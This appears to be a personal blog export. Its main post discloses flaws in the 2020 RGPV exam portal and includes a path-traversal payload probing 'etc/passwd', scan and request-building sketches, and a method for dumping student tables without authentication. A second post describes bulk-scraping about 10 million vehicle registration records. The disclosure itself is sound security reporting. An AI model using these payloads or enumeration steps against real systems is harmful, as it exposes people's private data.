[{"content":"preface the main reason behind this blog is to highlight how serious mistakes made without proper preparation can be, and the impact of such mistakes. in this blog, i\u0026rsquo;ll cover how the rgpv exam portal was so vulnerable that it publicly exposed the private data and submissions of around 49,000 students, and how it could have ruined everyone\u0026rsquo;s exam without any authentication.\nimpact of the vulnerabilities includes:\ndata leak of 49,000 rgpv students, covering all possible pii (phone number, email, etc.) question paper leak submitting the exam for any other student unlimited image upload to their server an lfi exploit which lets you read file contents from their server viewing all student submissions, such as answers from the final exams held during 24th aug - 27th aug 2020 introduction after the covid-19 pandemic started, rgpv university announced that for final-year students it planned to organize an exam consisting of 40 mcq questions, conducted as an open-book exam as mentioned here. the process started with two mock exams to test whether things worked, followed by the final papers from the 24th of august till the 1st of september 2020.\nwith this in place, rgpv created an exam portal for us, which was handled by eduvita. registration and portal creation happened at rgpvexam.in. the overall exam process worked by assigning one unique url to every student, which allowed that particular student to take the exam.\nstep towards testing the exam portal during the first day of the exam, there were many issues where the portal kept returning: network error. 
the full story can be found here, which shows that there were technical difficulties, and i faced this issue as well.\nbeing a computer science engineer, i was curious about this scenario, so as a first step i opened the debugger tool and investigated what was happening. at first, i encountered a debugger statement which they initialized in their index.html file, which prevents people from debugging their javascript code. if you are curious, read about it here.\non bypassing this, i observed my network tab and found that a 504 error was returned, as shown in the image.\nnext, i wanted to know whether their website was vulnerable or not. this curiosity led me to the nmap tool: i ran one vulnerability check script, and after 5 minutes it reported two exploits:\nhttp-phpmyadmin-dir-traversal: php file inclusion vulnerability which allows remote attackers to include local files via the redirect parameter, possibly involving the subform array. http-vuln-cve2011-3192: vulnerable to a denial of service attack when numerous overlapping byte ranges are requested. the second vulnerability leaned towards a dos attack, but the first was shocking, as it was an lfi exploit (local file inclusion). 
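the scan above boils down to running nmap\u0026rsquo;s \u0026ldquo;vuln\u0026rdquo; script category against the host. a minimal sketch that only assembles the command (the target is a placeholder, and such a scan should only be run with the owner\u0026rsquo;s permission):

```python
# sketch: assemble the nmap invocation for a vulnerability-script scan.
# "vuln" is nmap's built-in NSE script category; -sV enables service detection
# so version-specific scripts can fire. the target host is a placeholder.
def build_vuln_scan_cmd(target: str) -> list:
    return ["nmap", "-sV", "--script", "vuln", target]

# run e.g. via subprocess.run(build_vuln_scan_cmd("example.com"), ...);
# findings like http-phpmyadmin-dir-traversal appear in the script output
```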
to confirm the hypothesis, i tested it by traversing random directories, and after 8 - 10 attempts i was able to reproduce it with:\n\u0026lt;base_url\u0026gt;/index.php/?p=../../../\u0026lt;any_file_name\u0026gt;\nimpact: allows anyone to access local files and directories, including files like environment keys, logs, or other sensitive data.\nunderstanding tech stack before moving ahead, i explored their tech stack, and with a little bit of digging i found out that they were using:\nfrontend - angular js backend - express web server - nginx database - mongodb with this knowledge, i went ahead observing their api structure and started messing around with it. at first, i sent one random post request, and in the response i got:\nthis was my first red flag that things were not right because, in production, it\u0026rsquo;s not good practice to expose the error stack. later on, the web server went down, so i had to call it a day.\nthe next day, i repeated the vulnerability test and found that the lfi exploit was no longer present, which is an improvement. (the lfi was there till the 24th of august 2020.)\nfor my next paper on 26th august 2020, i was prepared for further testing: i captured all the network requests happening and noted down all the endpoints and their content. 
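the lfi check i repeated each day can be scripted; a minimal sketch under the assumption that the payload format is exactly the one shown earlier (base url and file name are placeholders):

```python
# hypothetical sketch of the traversal probe described earlier; base_url is a
# placeholder, and this should only be run against systems you may legally test.
def lfi_url(base_url: str, file_name: str, depth: int = 3) -> str:
    # builds <base_url>/index.php/?p=../../../<file_name>
    return f"{base_url}/index.php/?p={'../' * depth}{file_name}"

# fetching lfi_url(base, "etc/passwd") and seeing "root:" in the body
# would confirm the vulnerability is still present
```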
so for a typical exam on the rgpv exam portal, the flow was:\ncheck otp: \u0026lt;base_url\u0026gt;/common/student/urlcheck check dob/fathers name: \u0026lt;base_url\u0026gt;/common/student/checkdob upload photograph: \u0026lt;base_url\u0026gt;/common/student/checkexamconfig confirm profile: \u0026lt;base_url\u0026gt;/common/student/confirmprofile waiting phase: \u0026lt;base_url\u0026gt;/common/student/checkexamconfig exam started: \u0026lt;base_url\u0026gt;/common/paper/\u0026lt;exam_code\u0026gt; exam submission: \u0026lt;base_url\u0026gt;/common/paper/\u0026lt;exam_code\u0026gt; the problem with all these steps is that, except for steps 1 and 3, each post request to an endpoint needs only enrollment_no in its body to get a response. this is worrying because, ideally, a jwt token should be sent in a header to act as authentication.\nimpact given any person\u0026rsquo;s enrollment_no which exists in their database, anyone can:\n1. question paper leak get the full question paper in json format as a response, including the complete question list and answer list.\n2. create/update/delete exam submission as explained above, with just an enrollment number, anyone can easily overwrite another student\u0026rsquo;s submission without any authentication.\n3. upload image without auth the third step is uploading your photo through the webcam. the client side captures an image and sends it to a backend endpoint with only the file content and no authentication. so, in reality, anyone can upload any image to the given endpoint and spam the given aws s3 storage with their cat photos.\n4. minor data leak the fourth step is just a confirmation page which takes enrollment_no and responds with:\nname ip address institute name reverse engineering frontend understanding compiled angular js code is quite painful, but i was very interested in all the endpoints registered in the code. 
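the missing authentication in the flow above is easy to see once you write the request down. a sketch of what one of these calls looked like (the enrollment number is invented, and the body shape is my assumption based on the endpoints listed above):

```python
# sketch of the flaw described above: the only "credential" the portal
# required was a guessable enrollment number in the post body.
def build_profile_request(base_url: str, enrollment_no: str):
    url = f"{base_url}/common/student/confirmprofile"
    body = {"query": {"enrollment_no": enrollment_no}}
    headers = {"Content-Type": "application/json"}  # note: no Authorization header at all
    return url, body, headers

# posting this body to the url returns the student's name, ip address and
# institute name -- for any enrollment number in the database
```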
as a first step, i saved the rgpvexam.in page and checked out their js code by prettifying it and searching for \u0026ldquo;http.post\u0026rdquo; in the code. once i understood their code, i found all the endpoints registered over there:\ncheckurl(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { query: e }) }\ncheckdob(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/checkdob`, { query: e }) }\ncheckexamconfig(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/checkexamconfig`, { query: e }) }\nconfirmprofile(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/confirmprofile`, { query: e }) }\ngetresult(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/getresult`, { query: e }) }\ngetquestions(t, e) { return this.http.post(`${this.baseurl}/paper/${t}`, e) }\nupdateresult(t, e) { return this.http.post(`${this.baseurl}/paper/updateresult/${t}`, { query: e }) }\nupdateseen(t, e) { return this.http.post(`${this.baseurl}/paper/updateseen/${t}`, { query: e }) }\nupdateanswered(t, e) { return this.http.post(`${this.baseurl}/paper/updateanswered/${t}`, { query: e }) }\ngetdata(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { query: e }) }\nsearchdata(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { query: e }) }\ncreatedata(t, e) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { doc: e }) }\nupdatedata(t, e, n) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { doc: n }) }\ndeletedata(t, e) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { id: e }) }\nmaillink(t) { return 
this.http.post(`${this.baseurl}/${t}/urlcheck`, { enrollment_no: t }) }\nmailotp(t) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { enrollment_no: t }) }\ncheckotp(t, e) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { enrollment_no: t }) }\nuploadfile(t) { const e = new formdata; return e.append(\u0026#34;file\u0026#34;, t, t.name), this.http.post(dc.url + \u0026#34;/api/file/uploadstudentimage\u0026#34;, e, { reportprogress: !0, observe: \u0026#34;events\u0026#34; }) }\nuploadface(t, e) { const n = new formdata; return n.append(\u0026#34;file\u0026#34;, e, e.name), this.http.post(dc.url + \u0026#34;/api/file/uploadface/\u0026#34; + t, n, { reportprogress: !0, observe: \u0026#34;events\u0026#34; }) }\nthis confirms that all endpoints were using enrollment_no as their identifier, without any authentication.\nbackend once i knew about all the endpoints, it was time to test other endpoints as well which were not mentioned in the frontend code. this is where i started experimenting with random endpoints, because there had to be something out there.\none thing repeated in each endpoint was:\n\u0026lt;base_url\u0026gt;/common/\u0026lt;something\u0026gt;\nwhere something is either student or paper. for testing, i tried a random string like \u0026ldquo;table\u0026rdquo;, and the response was a bit shocking, as shown in the image.\nhere, \u0026ldquo;table not found\u0026rdquo; means that anything after /common/ is treated as a table name, and the endpoint returns all data present for that table.\ni tried multiple strings like \u0026ldquo;exam\u0026rdquo;, \u0026ldquo;user\u0026rdquo; or anything sensitive, and found multiple table names which were present.\nto show how serious this is: anyone with bad intentions could have written a script with common table names and spammed the endpoint to extract every single row from every table.\nimpact: the vulnerability existed till the 28th of august 2020, which covers the mock tests and 
two final exams for all possible branches.\n1. /common/student reveals the information of 49 thousand students present in the database who registered for the rgpv exam portal. this includes every piece of pii which rgpv has (like dob, ip, phone_no, email, etc.), including each student\u0026rsquo;s unique id, the otp which was meant to be stored safely, and much more.\nin general, the privacy of every student was compromised, and no one knows how many people extracted the data and might have sold it or used it for marketing purposes.\n2. /common/result reveals every student\u0026rsquo;s submission, including all answers given for each question, at which time each question was seen, and more.\nin short, anyone could know which student took which exam, with how much correctness and how much time taken.\n3. /common/institute reveals all institutes with their id and name present in the db. this was not much help in revealing sensitive data, but still not good to share.\nconclusion the whole process of organizing the final exam was heavily rushed, which is why i found multiple vulnerabilities. i found an lfi and a data breach in every possible way; the privacy of around 49 thousand students\u0026rsquo; data was compromised by the exam portal. the problem is that this mistake is not reversible; the damage is already done. but thanks to rgpv for realizing this later on and fixing the problem.\nwhat i did from my end? as soon as i found out about these exploits, i approached almost all possible contacts:\nrgpv - no reply from \u0026ldquo;rgpvexam2020@rgtu.net\u0026rdquo; nciipc - got reply + sent report aicte - no reply for minor questions, i approached via telegram but got no response there either.\nwhat\u0026rsquo;s next? 
as of the 28th of august 2020, we were notified in the telegram channel that:\nin short, some security updates were made, but what exactly they were is still unknown from the given message. i believe they should have at least mentioned what sort of mess they created to start with. there are still a few things which need improvement.\nfrom my end, once i saw the message, i quickly checked all the api endpoints again, and finally, those exploits are gone. getting a student\u0026rsquo;s data or any table data is no longer possible, so that is fixed. the examination process now uses a jwt token: once the user enters via the unique url and confirms dob and father\u0026rsquo;s name, a jwt token is returned and used in future endpoints. so this is great news for everyone.\nbut the real question remains: is this the solution? technically yes, but what about the damage which already happened? the data is already leaked, and because each user\u0026rsquo;s otp is already leaked, we are all still exposed.\nhaving no authentication mechanism to start with and introducing it later is an improvement, but why was this compromised on a platform with such a large audience? and who will be responsible for it? that is still unknown.\n","date":"2024-06-30","permalink":"https://shashank-sharma.xyz/posts/how-vulnerable-was-rgpv-exam-2020/","summary":"Preface The main reason behind this blog is to understand the seriousness of mistakes that were made without any proper arrangements and the impact of such mistakes. 
In this blog, I\u0026rsquo;ll be covering how the RGPV Exam portal was so vulnerable that it exposed around 49,000 students\u0026rsquo; private data/submissions publicly and how it could have ruined everyone\u0026rsquo;s exam without any authentication.\nImpact of given vulnerabilities include:\n49,000 students of RGPV student data leak which includes all possible PII data (like: phone number, email, etc) Question paper leak Submit exam for any other student Unlimited image upload to their server LFI Exploit which allows you to see file content from their server View all student submission like question answered from final exams held during 24th Aug - 27th Aug 2020 Introduction After the Covid-19 pandemic started, RGPV University announced that for final year students, they are planning to organize an exam which will consist of MCQ questions (total 40 questions) and it will be an open book exam as mentioned here.","title":"how vulnerable was rgpv exam 2020"},]
[{"content":"preface testing\n","date":"2024-06-30","permalink":"https://shashank-sharma.xyz/microblog/test-micro-blog/","summary":"Preface Testing","title":"test micro blog"},]
[{"content":" introduction python is really a powerful language, and with proper use of it anyone can make beautiful things. after studying python i was really impressed by its power, and to be more specific, i really love how easily we can scrape any website with its help. scraping is the process of extracting data from a website through its html. so i learned the basics and started scraping many websites.\nrecently i thought of creating something big through scraping, but i had no idea what to do. then i came across the site of mp transportation and realized that they have a lot of data inside their website. the website is very simple: you open the site, enter your transport number details, and search. you then get results about your transport vehicle, which include type, color, etc.\nwith python 2.7 i created one script to scrape, because with python 3.x there was less support for some modules. i decided to go for the \u0026rsquo;last\u0026rsquo; search type because with the others i was facing some issues (maybe a site problem). for this i had to search every input from 0000 - 9999, which makes around 10000 requests. we took 4 digits because a minimum of 4 characters is required. so yeah, it was that large.\ni created one program and started scraping, but then with the 0000 input and \u0026rsquo;last\u0026rsquo; type search i found that it scraped successfully and i got 1700+ records. the problem was that it took 5 minutes to complete 1 request. this happened because of server delay: it was not my problem, but the server\u0026rsquo;s problem to search that much data in its database. after realizing this, i did some maths.\nif 1 request takes 5 minutes, then 10000 requests = 50000 minutes = 833.33 hours = 35 days approx = 1 month 4 days\nso in short, i would need my laptop to run continuously for 1 month and 4 days, and trust me, it\u0026rsquo;s really a bad idea to do so. 
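the back-of-envelope estimate above can be checked in a few lines (a sanity-check sketch, using only the numbers already stated):

```python
# sanity check of the sequential-scraping estimate above
MINUTES_PER_REQUEST = 5
TOTAL_REQUESTS = 10000      # 'last' search inputs 0000 - 9999

total_minutes = MINUTES_PER_REQUEST * TOTAL_REQUESTS  # 50000 minutes
total_hours = total_minutes / 60                      # ~833.33 hours
total_days = total_hours / 24                         # ~34.7, i.e. about 35 days
```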
but is it worth doing?\nif 1 request gives approx 1000 records, 10000 requests = 10,000,000\nso yeah, hypothetically, in 35 days i would be able to collect 10 million records. but still, being a programmer, we must do things as fast as possible, and to achieve this one thing was sure: i needed some power, memory, security, etc. i tried multiprocessing and multithreading, but it was not working as expected.\nso the solution to this problem was getting my hands on some free servers. i started searching for a free hosting company which supports python, and thought of deploying my script over there. i tried this on pythonanywhere.com and on heroku with the help of the flask framework, but there was no success. i waited almost 15 days to decide what to do. later i found one site, scrapinghub.com, which lets you deploy spiders on the cloud and takes care of the rest, so i went for it and started learning it.\nafter that i learned how to use scrapy and scrapinghub, and i created another new program to scrape the website with the help of scrapy spiders. source code for this is at the end of this page.\nexperiment day 1 - 4,092,328 (4 million records in 17 hours) id1 - items - 1,134,421 (15 hours)\nid2 - items - 1,025,282 (17 hours)\nid3 - items - 983,367 (14 hours)\nid4 - items - 949,228 (13 hours)\nsize - 1.3 gb day 2 - 6,498,462 (6.4 million records in 17 hours)\n(created 2 more ids to boost the process)\nid1 - items - 1,241,643 (17 hours)\nid2 - items - 1,000,308 (15 hours)\nid3 - items - 962,863 (15 hours)\nid4 - items - 1,052,844 (15 hours)\nid5 - items - 1,144,686 (16 hours)\nid6 - items - 1,096,118 (15 hours)\nsize - 2.4 gb\nfinal result total data collected: 10,590,790 total size: 3.7 gb\ntime consumed: 34 hours\nin just 34 hours of scraping we collected 10 million records, as estimated earlier. 
if we tried to do this process the old-fashioned way, on a laptop, it would have taken 1 month, so we optimized it.\ndata analysis the main question that arises is: what to do with the data? which tools to use while analyzing? the size of our json files is huge. if we could convert the json files to a database file it would be really great, but doing so would again require loads of time.\nfrom json to database\nwe can do 5 records per second,\nfor 10,000,000 = 2,000,000 seconds = 33333 minutes = 555 hours = 23 days.\nnow that is not feasible.\ni even tried doing it through an sql script, which is much better compared to the previous script, but it would still take approx 20 days.\nso we will use the data in json format, load it into a python script, and then do our maths over there. loading one file may take approx 10 minutes, but time is not the issue. the problem is that loading a json file in python takes a lot of memory, and since we are working on a normal laptop we need to think of something else. to avoid this problem i used the ijson module in python. it\u0026rsquo;s a really handy tool which iterates over json data rather than loading it all at once. with this power we need to sacrifice a little time, but it\u0026rsquo;s still worth it.\nstats in which district are there the most transport vehicles?\nindore - 1625663 bhopal - 1023054 jabalpur - 589875 gwalior - 477625 ujjain - 371559 sagar - 272974 chhindwara - 268971 ratlam - 258581 rewa - 242377 dewas - 240930 link: https://plot.ly/~shashank-sharma/19/\nwhich color do people prefer while buying a transport vehicle?\nblack - 2137200 red - 683663 not specify - 560975 blue - 341134 grey - 288952 white - 283631 silver - 255836 rbk - 238896 p black - 177379 pbk - 168518 link: https://plot.ly/~shashank-sharma/11/\nwhich company has the most vehicles in mp?\nhero honda motors - 2032369 bajaj auto ltd - 1677867 hero moto corp ltd. - 1563023 tvs motor co. ltd. 
- 1130974 honda mcy \u0026amp; scooter p i ltd - 1102624 mahindra \u0026amp; mahindra ltd - 463175 tata motors ltd - 280684 maruti suzuki india limited - 258392 maruti udyog ltd - 249949 escorts ltd - 139231 link: https://plot.ly/~shashank-sharma/13/\nin which year were the most vehicles registered?\n2016 - 1406802 2014 - 1392520 2015 - 1166079 2013 - 964026 2011 - 845374 2012 - 734092 2010 - 716772 2009 - 607693 2008 - 481315 2007 - 471963 link: https://plot.ly/~shashank-sharma/15/\nwhich vehicle model is the most common?\nsplendor plus - 325878 platina - 302537 hf deluxe self cast wheel - 254166 activa (ele auto \u0026amp; kick start) - 216252 tvs star city - 210397 cd dlx - 188885 discover dts - si - 180193 passion pro(drm-slf castwheel) - 163088 activa 3g eas ks cbs bs3 - 162542 passion plus - 146584 link: https://plot.ly/~shashank-sharma/17/\nwhat type of vehicle do people own in majority?\nmotor cycle - 6531708 scooter - 1291932 motor car - 881930 tractor - 687360 goods truck - 210932 moped - 197450 omni bus for private use - 142478 auto rickshaw passenger - 124051 trolly - 111358 pick up van - 95238 link: https://plot.ly/~shashank-sharma/9/\nand many more questions can be answered with the given data.\nthank you for reading till the end of this page. i hope by now you have realized the real power of python.\nsource code: https://github.com/shashank-sharma/mp-transportation-analysis\n","date":"2017-04-16","permalink":"https://shashank-sharma.xyz/posts/india-mp-transportation-analysis/","summary":"Introduction Python is really a powerful language and with proper use of it anyone can make beautiful things. After studying Python I was really impressed by its power and to be more specific I really love how we can scrape any website easily with the help of python. Scraping is a process of extracting data from website by their html data. 
So I learned its basic and started scraping many website.\nRecently I thought of creating something big through scraping but I was having no idea what to do.","title":"india's mp transportation analysis through python"},]
[{"content":"what i do? software engineer at coursera got something to discuss? drop me a mail at: shashank.sharma98@gmail.com","date":"0001-01-01","permalink":"https://shashank-sharma.xyz/about/","summary":"What I do? Software Engineer at Coursera Got something to discuss? Drop me a mail at: shashank.","title":"about"},]
[{"content":"๐ personal link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐จ tools link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐บ blog link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐ documentation bookmark item one https://bookmark-item-one.com bookmark item two https://bookmark-item-two.com bookmark item three https://bookmark-item-three.com ","date":"0001-01-01","permalink":"https://shashank-sharma.xyz/nav/","summary":"๐ Personal link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐จ Tools link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐บ Blog link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐ Documentation bookmark item one https://bookmark-item-one.com bookmark item two https://bookmark-item-two.com bookmark item three https://bookmark-item-three.com ","title":"navigation"},]